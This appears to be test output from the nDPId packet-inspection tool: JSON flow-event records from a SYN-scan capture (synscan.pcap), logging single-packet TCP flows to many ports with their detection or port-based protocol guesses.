-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":543,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":544,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":544,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":956,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6689,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":956,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6689,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":892,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":545,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":892,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":545,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":999,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6689,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":999,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6689,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":963,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":545,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":963,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":545,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6692,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6692,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":548,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AFP","breed":"Acceptable","category":"DataTransfer"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6692,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6692,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":548,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AFP","breed":"Acceptable","category":"DataTransfer"}} 
-00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":41511,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":41511,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":41511,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":41511,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":895,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2601,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":895,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2602,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2602,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":960,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2601,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":960,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":554,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RTSP","breed":"Fun","category":"Media"}} 
-00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2602,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2602,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6699,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6699,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":555,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":554,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18988,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":555,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":989,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2604,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"OSPF","breed":"Acceptable","category":"Network"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":989,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6699,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 